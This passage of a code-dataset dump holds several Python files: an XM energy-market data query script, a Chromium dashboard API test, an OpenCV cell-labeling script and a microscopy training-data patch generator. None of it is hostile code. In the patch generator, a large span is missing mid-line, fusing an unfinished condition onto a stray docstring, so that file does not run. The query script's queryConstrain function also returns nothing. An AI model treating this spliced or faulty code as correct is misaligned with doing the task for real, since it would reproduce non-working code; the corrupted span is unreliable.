d\n\ndef joinInfo(item_list, sd, ed, freq, join_var):\n\n d = pd.DataFrame()\n for var in item_list:\n if len(d.columns) == 0:\n d = queryToTable(var[0], var[1], sd, ed, freq)\n else:\n df = queryToTable(var[0], var[1], sd, ed, freq)\n if len(df.columns) > 0:\n d = pd.merge(d, df, on=join_var, how='outer')\n\n return d\n\n\ndef queryConstrain(item_list, sd, ed, freq, delta, join_var):\n ed = min(dt.date.today(), ed)\n\n if ed-sd <= delta:\n d = joinInfo(item_list, sd, ed, freq, join_var)\n else:\n print('break')\n dm = sd + delta\n d = joinInfo(item_list, sd, ed, freq, join_var)\n sd = dm\n dm = min(sd + delta, ed)\n while dm <= ed:\n df = joinInfo(item_list, sd, ed, freq, join_var)\n d = pd.concat([d, df], axis=0)\n sd = dm\n dm = sd + delta\n return\n\n\ndef replace(dict, key):\n return dict[key]\n\n\n\ndef goodNames(d, item, freq):\n if freq == 'Horaria':\n d['Time'] = d['Hour'].apply(lambda x: replace(tiempos, x))\n d['datetime'] = d['Date'] + \" \" + d['Time']\n d['datetime'] = pd.to_datetime(d['datetime'])\n d = d.drop(['Hour'], axis=1)\n d = d.drop(['Time'], axis=1)\n d = d.drop(['Date'], axis=1)\n if item == 'Sistema':\n d = d.drop(['Values_code'], axis=1)\n if freq == 'Diaria':\n d['Date'] = pd.to_datetime(d['Date']).dt.date\n\n d = d.rename(columns=instances[item])\n return d\n\ndef findData(item, item_list, sd, ed, freq, join_var):\n\n d = joinInfo(item_list, sd, ed, freq, join_var)\n d = goodNames(d, item, freq)\n\n if item == 'Recursos':\n names = pd.read_csv('https://raw.githubusercontent.com/NNE-ISA/XM_API_to_data/main/info_nombres/recursos.csv')\n vars_join = [i for i in list(names.columns) if i in list(d.columns)]\n d = pd.merge(d, names, on= vars_join, how='left')\n if item == 'Agentes':\n names = pd.read_csv('https://raw.githubusercontent.com/NNE-ISA/XM_API_to_data/main/info_nombres/agentes.csv')\n vars_join = [i for i in list(names.columns) if i in list(d.columns)]\n d = pd.merge(d, names, on= vars_join, how='left')\n\n return d\n\n\ndef xmQueryAPI(item, sd, ed, freq, var=[], phat='./', save=False):\n global inven_met\n\n print('Se inicia la consulta')\n\n if not var:\n var = list(inven_met[item][freq]['var'].keys())\n\n join_var = inven_met[item][freq]['join_var']\n item_list = list([inven_met[item][freq]['var'][x] for x in var])\n\n if save:\n d = findData(item, item_list, sd, ed, freq, join_var)\n name = phat + '\\\\' + item + '_' + str(sd) + '__' + str(ed) + '.csv'\n\n try:\n d.to_csv(name, index = False)\n except:\n name = name.replace('\\\\','/')\n d.to_csv(name, index = False)\n\n print('se ha guardado la información correctamente')\n else:\n d = findData(item, item_list, sd, ed, freq, join_var)\n print('Se ha consultado al informaciónc on exito')\n return d", "sub_path": "xm_query.py", "file_name": "xm_query.py", "file_ext": "py", "file_size_in_byte": 12998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydataxm.ReadDB", "line_number": 149, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 160, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 164, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 178, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 196, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 211, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 233, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "235324614", "text": "# Copyright 2019 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport json\n\n# Importing mock_oauth2_decorator before file_bug mocks out\n# OAuth2Decorator usage in that file.\n# pylint: disable=unused-import\nfrom dashboard import mock_oauth2_decorator\n# pylint: enable=unused-import\n\nfrom dashboard.api import api_auth\nfrom dashboard.api import existing_bug\nfrom dashboard.common import testing_common\nfrom dashboard.models import anomaly\nfrom dashboard.models import graph_data\n\n\nclass ExistingBugTest(testing_common.TestCase):\n\n def setUp(self):\n super(ExistingBugTest, self).setUp()\n self.SetUpApp([('/api/existing_bug', existing_bug.ExistingBugHandler)])\n self.SetCurrentClientIdOAuth(api_auth.OAUTH_CLIENT_ID_ALLOWLIST[0])\n self.SetCurrentUserOAuth(None)\n testing_common.SetSheriffDomains(['example.com'])\n\n def _Post(self, **params):\n return json.loads(self.Post('/api/existing_bug', params).body)\n\n def testInvalidUser(self):\n self.Post('/api/existing_bug', status=403)\n\n def testSuccess(self):\n self.SetCurrentUserOAuth(testing_common.INTERNAL_USER)\n path = 'm/b/s/m/c'\n test = graph_data.TestMetadata(\n has_rows=True,\n id=path,\n improvement_direction=anomaly.DOWN,\n units='units')\n test.put()\n key = anomaly.Anomaly(test=test.key, start_revision=1, end_revision=1).put()\n graph_data.Row(id=1, parent=test.key, value=1).put()\n response = self._Post(key=key.urlsafe(), bug=12345)\n self.assertEqual({}, response)\n self.assertEqual(12345, key.get().bug_id)\n self.assertEqual('chromium', key.get().project_id)\n", "sub_path": "dashboard/dashboard/api/existing_bug_test.py", "file_name": "existing_bug_test.py", "file_ext": "py", "file_size_in_byte": 1805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "dashboard.common.testing_common.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dashboard.common.testing_common", "line_number": 24, "usage_type": "name"}, {"api_name": "dashboard.api.existing_bug.ExistingBugHandler", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dashboard.api.existing_bug", "line_number": 28, "usage_type": "name"}, {"api_name": "dashboard.api.api_auth.OAUTH_CLIENT_ID_ALLOWLIST", "line_number": 29, "usage_type": "attribute"}, {"api_name": "dashboard.api.api_auth", "line_number": 29, "usage_type": "name"}, {"api_name": "dashboard.common.testing_common.SetSheriffDomains", "line_number": 31, "usage_type": "call"}, {"api_name": "dashboard.common.testing_common", "line_number": 31, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "dashboard.common.testing_common.INTERNAL_USER", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dashboard.common.testing_common", "line_number": 40, "usage_type": "name"}, {"api_name": "dashboard.models.graph_data.TestMetadata", "line_number": 42, "usage_type": "call"}, {"api_name": "dashboard.models.graph_data", "line_number": 42, "usage_type": "name"}, {"api_name": "dashboard.models.anomaly.DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dashboard.models.anomaly", "line_number": 45, "usage_type": "name"}, {"api_name": "dashboard.models.anomaly.Anomaly", "line_number": 48, "usage_type": "call"}, {"api_name": "dashboard.models.anomaly", "line_number": 48, "usage_type": "name"}, {"api_name": "dashboard.models.graph_data.Row", "line_number": 49, "usage_type": "call"}, {"api_name": "dashboard.models.graph_data", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "87711805", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage.filters import maximum_filter\nimport csv\nimport math\nfrom skimage.feature import peak_local_max\n\nframe = 200\n\n\ndef labeling(x_cen, y_cen):\n gro = cv2.imread('optbasis_graphcut.tif')\n gu = cv2.imread('gausian_00200.tif')\n gu = cv2.cvtColor(gu, cv2.COLOR_BGR2GRAY)\n gray = gro[:, :, 2]\n lab_img = np.zeros((gro.shape[0], gro.shape[1]))\n ret, bin = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n nLabels, labelImage = cv2.connectedComponents(bin)\n\n nLabels = nLabels - 1\n new_labels = 1\n id_list = np.zeros((0, 3))\n for i in range(x_cen.shape[0]):\n x_point = int(x_cen[i])\n y_point = int(y_cen[i])\n id = labelImage[x_point, y_point]\n lab_img[labelImage == id] = gu[labelImage == id]\n return new_labels, lab_img\n\n\ndef preprocessing():\n gro = cv2.imread('frame200.png')\n gray = cv2.cvtColor(gro, cv2.COLOR_BGR2GRAY)\n ret, bin = cv2.threshold(gray, gray.max() * 0.8, 255, cv2.THRESH_BINARY)\n nLabels, labelImage = cv2.connectedComponents(bin)\n x_cens = []\n y_cens = []\n mask = np.zeros((1040, 1392))\n for i in range(1, nLabels):\n x, y = np.where(labelImage == i)\n for j in range(x.shape[0]):\n if (x[j] != 1039) & (x[j] != 0) & (y[j] != 1391) & (y[j] != 0):\n if (gray[x[j], y[j]] >= gray[x[j] + 1, y[j]]) & (gray[x[j], y[j]] >= gray[x[j] - 1, y[j]]) & (\n gray[x[j], y[j]] >= gray[x[j], y[j] + 1]) & (gray[x[j], y[j]] >= gray[x[j], y[j] - 1]):\n x_cen = x[j]\n y_cen = y[j]\n mask[x[j], y[j]] = 255\n mask = mask.astype('uint8')\n nLabels, labelImage = cv2.connectedComponents(mask)\n\n for i in range(1, nLabels):\n x, y = np.where(labelImage == i)\n x_cen = 0\n y_cen = 0\n for j in range(x.shape[0]):\n x_cen += x[j]\n y_cen += y[j]\n x_cen = x_cen / x.shape[0]\n y_cen = y_cen / y.shape[0]\n x_cens = np.append(x_cens, x_cen)\n y_cens = np.append(y_cens, y_cen)\n return x_cens, y_cens\n\n\nif __name__ == \"__main__\":\n x_cen, y_cen = preprocessing()\n nlabels, label = labeling(x_cen, y_cen)\n plt.imshow(label[600:1000, 400:800]), plt.show()\n", "sub_path": "labeling.py", "file_name": "labeling.py", "file_ext": "py", "file_size_in_byte": 2323, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.connectedComponents", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.connectedComponents", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.connectedComponents", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "130908938", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 27 13:07:18 2019\n\n@author: aimachine\n\"\"\"\n\nimport numpy as np\nfrom .helpers import normalizeFloat\nfrom glob import glob\nfrom tifffile import imread\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom stardist import random_label_cmap\nnp.random.seed(42)\nlbl_cmap = random_label_cmap()\nimport collections\nfrom itertools import chain\nfrom collections import namedtuple\nfrom skimage.transform import downscale_local_mean\nfrom stardist import fill_label_holes\nfrom sklearn.model_selection import train_test_split\ntry:\n from pathlib import Path\n Path().expanduser()\nexcept (ImportError,AttributeError):\n from pathlib2 import Path\n\ntry:\n import tempfile\n tempfile.TemporaryDirectory\n\nexcept (ImportError,AttributeError):\n from backports import tempfile\nfrom csbdeepLocal.data import create_patches, RawData,no_background_patches,norm_percentiles,shuffle_inplace,sample_patches_from_multiple_stacks\nfrom csbdeep.data.transform import Transform, permute_axes\nfrom csbdeep.utils import _raise, consume, compose, axes_dict, axes_check_and_normalize\nimport sys, warnings\ndef create_downsample_patches(\n raw_data,\n patch_size,\n n_patches_per_image,\n patch_axes = None,\n save_file = None,\n transforms = None,\n patch_filter = no_background_patches(),\n normalization = norm_percentiles(),\n shuffle = True,\n verbose = True,\n downsample_factor = 2\n ):\n \"\"\"Create normalized training data to be used for neural network training.\n Parameters\n ----------\n raw_data : :class:`RawData`\n Object that yields matching pairs of raw images.\n patch_size : tuple\n Shape of the patches to be extraced from raw images.\n Must be compatible with the number of dimensions and axes of the raw images.\n As a general rule, use a power of two along all XYZT axes, or at least divisible by 8.\n n_patches_per_image : int\n Number of patches to be sampled/extracted from each raw image pair (after transformations, see below).\n patch_axes : str or None\n Axes of the extracted patches. If ``None``, will assume to be equal to that of transformed raw data.\n save_file : str or None\n File name to save training data to disk in ``.npz`` format (see :func:`csbdeep.io.save_training_data`).\n If ``None``, data will not be saved.\n transforms : list or tuple, optional\n List of :class:`Transform` objects that apply additional transformations to the raw images.\n This can be used to augment the set of raw images (e.g., by including rotations).\n Set to ``None`` to disable. Default: ``None``.\n patch_filter : function, optional\n Function to determine for each image pair which patches are eligible to be extracted\n (default: :func:`no_background_patches`). Set to ``None`` to disable.\n normalization : function, optional\n Function that takes arguments `(patches_x, patches_y, x, y, mask, channel)`, whose purpose is to\n normalize the patches (`patches_x`, `patches_y`) extracted from the associated raw images\n (`x`, `y`, with `mask`; see :class:`RawData`). Default: :func:`norm_percentiles`.\n shuffle : bool, optional\n Randomly shuffle all extracted patches.\n verbose : bool, optional\n Display overview of images, transforms, etc.\n Returns\n -------\n tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, str)\n Returns a tuple (`X`, `Y`, `axes`) with the normalized extracted patches from all (transformed) raw images\n and their axes.\n `X` is the array of patches extracted from source images with `Y` being the array of corresponding target patches.\n The shape of `X` and `Y` is as follows: `(n_total_patches, n_channels, ...)`.\n For single-channel images, `n_channels` will be 1.\n Raises\n ------\n ValueError\n Various reasons.\n Example\n -------\n >>> raw_data = RawData.from_folder(basepath='data', source_dirs=['source1','source2'], target_dir='GT', axes='ZYX')\n >>> X, Y, XY_axes = create_patches(raw_data, patch_size=(32,128,128), n_patches_per_image=16)\n Todo\n ----\n - Save created patches directly to disk using :class:`numpy.memmap` or similar?\n Would allow to work with large data that doesn't fit in memory.\n \"\"\"\n ## images and transforms\n if transforms is None:\n transforms = []\n transforms = list(transforms)\n if patch_axes is not None:\n transforms.append(permute_axes(patch_axes))\n if len(transforms) == 0:\n transforms.append(Transform.identity())\n\n\n image_pairs, n_raw_images = raw_data.generator(), raw_data.size\n tf = Transform(*zip(*transforms)) # convert list of Transforms into Transform of lists\n image_pairs = compose(*tf.generator)(image_pairs) # combine all transformations with raw images as input\n n_transforms = np.prod(tf.size)\n n_images = n_raw_images * n_transforms\n n_patches = n_images * n_patches_per_image\n n_required_memory_bytes = 2 * n_patches*np.prod(patch_size) * 4\n\n ## memory check\n _memory_check(n_required_memory_bytes)\n\n ## summary\n if verbose:\n print('='*66)\n print('%5d raw images x %4d transformations = %5d images' % (n_raw_images,n_transforms,n_images))\n print('%5d images x %4d patches per image = %5d patches in total' % (n_images,n_patches_per_image,n_patches))\n print('='*66)\n print('Input data:')\n print(raw_data.description)\n print('='*66)\n print('Transformations:')\n for t in transforms:\n print('{t.size} x {t.name}'.format(t=t))\n print('='*66)\n print('Patch size:')\n print(\" x \".join(str(p) for p in patch_size))\n print('=' * 66)\n\n sys.stdout.flush()\n\n ## sample patches from each pair of transformed raw images\n X = np.empty((n_patches,)+tuple(patch_size),dtype=np.float32)\n Y = np.empty_like(X)\n\n for i, (x,y,_axes,mask) in tqdm(enumerate(image_pairs),total=n_images,disable=(not verbose)):\n if i >= n_images:\n warnings.warn('more raw images (or transformations thereof) than expected, skipping excess images.')\n break\n if i==0:\n axes = axes_check_and_normalize(_axes,len(patch_size))\n channel = axes_dict(axes)['C']\n # checks\n # len(axes) >= x.ndim or _raise(ValueError())\n axes == axes_check_and_normalize(_axes) or _raise(ValueError('not all images have the same axes.'))\n x.shape == y.shape or _raise(ValueError())\n mask is None or mask.shape == x.shape or _raise(ValueError())\n (channel is None or (isinstance(channel,int) and 0<=channel>> !tree data\n data\n ├── GT\n │ ├── imageA.tif\n │ ├── imageB.tif\n │ └── imageC.tif\n ├── source1\n │ ├── imageA.tif\n │ └── imageB.tif\n └── source2\n ├── imageA.tif\n └── imageC.tif\n >>> data = RawData.from_folder(basepath='data', source_dirs=['source1','source2'], target_dir='GT', axes='YX')\n >>> n_images = data.size\n >>> for source_x, target_y, axes, mask in data.generator():\n ... pass\n \"\"\"\n p = Path(basepath)\n pairs = [(f, p/target_dir/f.name) for f in chain(*((p/source_dir).glob(pattern) for source_dir in source_dirs))]\n len(pairs) > 0 or _raise(FileNotFoundError(\"Didn't find any images.\"))\n consume(t.exists() or _raise(FileNotFoundError(t)) for s,t in pairs)\n axes = axes_check_and_normalize(axes)\n n_images = len(pairs)\n description = \"{p}: target='{o}', sources={s}, axes='{a}', pattern='{pt}'\".format(p=basepath, s=list(source_dirs),\n o=target_dir, a=axes, pt=pattern)\n\n def _gen():\n for fx, fy in pairs:\n x, y = imread(str(fx)), imread(str(fy))\n x = downscale_local_mean(x, (downsample_factor, downsample_factor))\n y = downscale_local_mean(y, (downsample_factor, downsample_factor))\n len(axes) >= x.ndim or _raise(ValueError())\n yield x, y, axes[-x.ndim:], None\n\n return RawData(_gen, n_images, description)\n\n\n\n @staticmethod\n def from_arrays(X, Y, axes='CZYX'):\n \"\"\"Get pairs of corresponding images from numpy arrays.\"\"\"\n\n def _gen():\n for x, y in zip(X ,Y):\n len(axes) >= x.ndim or _raise(ValueError())\n yield x, y, axes[-x.ndim:], None\n\n return RawData(_gen, len(X), \"numpy array\")\ndef generate_2D_patch_training_data(BaseDirectory, SaveNpzDirectory, SaveName, patch_size = (512,512), n_patches_per_image = 64, transforms = None):\n\n \n raw_data = RawData.from_folder (\n basepath = BaseDirectory,\n source_dirs = ['Original'],\n target_dir = 'BinaryMask',\n axes = 'YX',\n )\n \n X, Y, XY_axes = create_patches (\n raw_data = raw_data,\n patch_size = patch_size,\n n_patches_per_image = n_patches_per_image,\n transforms = transforms,\n save_file = SaveNpzDirectory + SaveName,\n )\ndef _memory_check(n_required_memory_bytes, thresh_free_frac=0.5, thresh_abs_bytes=1024*1024**2):\n try:\n # raise ImportError\n import psutil\n mem = psutil.virtual_memory()\n mem_frac = n_required_memory_bytes / mem.available\n if mem_frac > 1:\n raise MemoryError('Not enough available memory.')\n elif mem_frac > thresh_free_frac:\n print('Warning: will use at least %.0f MB (%.1f%%) of available memory.\\n' % (n_required_memory_bytes/1024**2,100*mem_frac), file=sys.stderr)\n sys.stderr.flush()\n except ImportError:\n if n_required_memory_bytes > thresh_abs_bytes:\n print('Warning: will use at least %.0f MB of memory.\\n' % (n_required_memory_bytes/1024**2), file=sys.stderr)\n sys.stderr.flush() \ndef generate_downsample_2D_patch_training_data(BaseDirectory, SaveNpzDirectory, SaveName, patch_size = (512,512), n_patches_per_image = 64, downsample_factor = 2, transforms = None):\n\n \n raw_data = LocalRawData.from_folder (\n basepath = BaseDirectory,\n source_dirs = ['MoreOriginal'],\n target_dir = 'MoreBinary',\n axes = 'YX',\n downsample_factor = downsample_factor\n )\n \n X, Y, XY_axes = create_patches (\n raw_data = raw_data,\n patch_size = patch_size,\n n_patches_per_image = n_patches_per_image,\n transforms = transforms,\n save_file = SaveNpzDirectory + SaveName\n )\n\ndef generate_2D_training_data(Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display = 0):\n \n \n \n \n axes = 'SXYC'\n save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, None)\n \n \ndef generate_3D_training_data(Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display = 0, displayZ = 0):\n \n \n assert len(Imagedir) == len(Labeldir)\n \n axes = 'SZXYC'\n save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, displayZ)\n\n \ndef save_data(axes, Imagedir, Labeldir, SaveNpzDirectory, SaveName, SaveNameVal,shapeX, shapeY, display, displayZ):\n \n\n data = []\n masks = []\n \n\n \n Y = sorted(glob(Labeldir + '/' + '*.tif'))\n print(Y)\n LabelImages = list(map(imread, Y))\n FilledLabelImages = [y for y in tqdm(LabelImages)]\n \n X = sorted(glob(Imagedir + '/' + '*.tif'))\n Images = list(map(imread, X))\n NormalizeImages = [normalizeFloat(image,1,99.8) for image in tqdm(Images)]\n \n\n\n assert all(Path(x).name==Path(y).name for x,y in zip(X,Y))\n \n for i in range(0, len(NormalizeImages)):\n \n X = NormalizeImages[i]\n Y = FilledLabelImages[i]\n Xbig = np.zeros([shapeX, shapeY]) \n Xbig[0:shapeX, 0:shapeY] = X\n \n Ybig = np.zeros([shapeX, shapeY]) \n Ybig[0:shapeX, 0:shapeY] = Y\n \n Xbig = np.expand_dims(Xbig, -1)\n Ybig = np.expand_dims(Ybig, -1)\n data.append(Xbig)\n masks.append(Ybig)\n \n \n data = np.array(data)\n masks = np.array(masks)\n \n if display is not None and display < len(NormalizeImages):\n if displayZ == None:\n plt.figure(figsize=(16,10))\n plt.subplot(121); plt.imshow(NormalizeImages[display],cmap='gray'); plt.axis('off'); plt.title('Raw image')\n plt.subplot(122); plt.imshow(FilledLabelImages[display],cmap=lbl_cmap); plt.axis('off'); plt.title('GT labels')\n None;\n else:\n plt.figure(figsize=(16,10))\n plt.subplot(121); plt.imshow(NormalizeImages[display][displayZ,:,:],cmap='gray'); plt.axis('off'); plt.title('Raw image')\n plt.subplot(122); plt.imshow(FilledLabelImages[display][displayZ,:,:],cmap=lbl_cmap); plt.axis('off'); plt.title('GT labels')\n None;\n \n \n print(data.shape, masks.shape)\n \n traindata, validdata, trainlabel, validlabel = train_test_split(data, masks, train_size = 0.95, test_size = 0.05, shuffle = True)\n \n save_full_training_data(SaveNpzDirectory, SaveName, traindata, trainlabel, axes)\n save_full_training_data(SaveNpzDirectory, SaveNameVal, validdata, validlabel, axes)\n\n \n \ndef _raise(e):\n raise e\n\n \ndef save_training_data(directory, filename, data, label, sublabel, axes):\n \"\"\"Save training data in ``.npz`` format.\"\"\"\n \n \n \n len(axes) == data.ndim or _raise(ValueError())\n np.savez(directory + filename, data = data, label = label, label2 = sublabel, axes = axes)\n \n \ndef save_full_training_data(directory, filename, data, label, axes):\n \"\"\"Save training data in ``.npz`` format.\"\"\"\n \n\n len(axes) == data.ndim or _raise(ValueError())\n np.savez(directory + filename, data = data, label = label, axes = axes) \n \n \n# https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef consume(iterator):\n collections.deque(iterator, maxlen=0)\n\n\n\n \n ", "sub_path": "Terminator/TerminatorUtils/npzfileGenerator.py", "file_name": "npzfileGenerator.py", "file_ext": "py", "file_size_in_byte": 17813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 16, "usage_type": "attribute"}, {"api_name": "stardist.random_label_cmap", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 26, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 32, "usage_type": "attribute"}, {"api_name": "csbdeepLocal.data.no_background_patches", "line_number": 47, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.norm_percentiles", "line_number": 48, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.permute_axes", "line_number": 110, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.Transform.identity", "line_number": 112, "usage_type": "call"}, {"api_name": "csbdeep.data.transform.Transform", "line_number": 112, "usage_type": "name"}, {"api_name": "csbdeep.data.transform.Transform", "line_number": 116, "usage_type": "call"}, {"api_name": "csbdeep.utils.compose", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 143, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 147, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 149, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 151, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 154, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_dict", "line_number": 155, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 158, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 158, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 159, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 160, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 161, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 162, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.sample_patches_from_multiple_stacks", "line_number": 164, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.shuffle_inplace", "line_number": 170, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 182, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 185, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 189, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 252, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 253, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 254, "usage_type": "call"}, {"api_name": "csbdeep.utils.consume", "line_number": 255, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 255, "usage_type": "call"}, {"api_name": "csbdeep.utils.axes_check_and_normalize", "line_number": 256, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 263, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 264, "usage_type": "call"}, {"api_name": "skimage.transform.downscale_local_mean", "line_number": 265, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 266, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 269, "usage_type": "call"}, {"api_name": "csbdeep.utils._raise", "line_number": 279, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 282, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData.from_folder", "line_number": 286, "usage_type": "call"}, {"api_name": "csbdeepLocal.data.RawData", "line_number": 286, "usage_type": "name"}, {"api_name": "csbdeepLocal.data.create_patches", "line_number": 293, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 304, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 309, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 310, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 310, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 313, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 314, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 314, "usage_type": "attribute"}, {"api_name": "csbdeepLocal.data.create_patches", "line_number": 326, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 360, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 362, "usage_type": "argument"}, {"api_name": "tqdm.tqdm", "line_number": 363, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 365, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 366, "usage_type": "argument"}, {"api_name": "helpers.normalizeFloat", "line_number": 367, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 367, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.array", 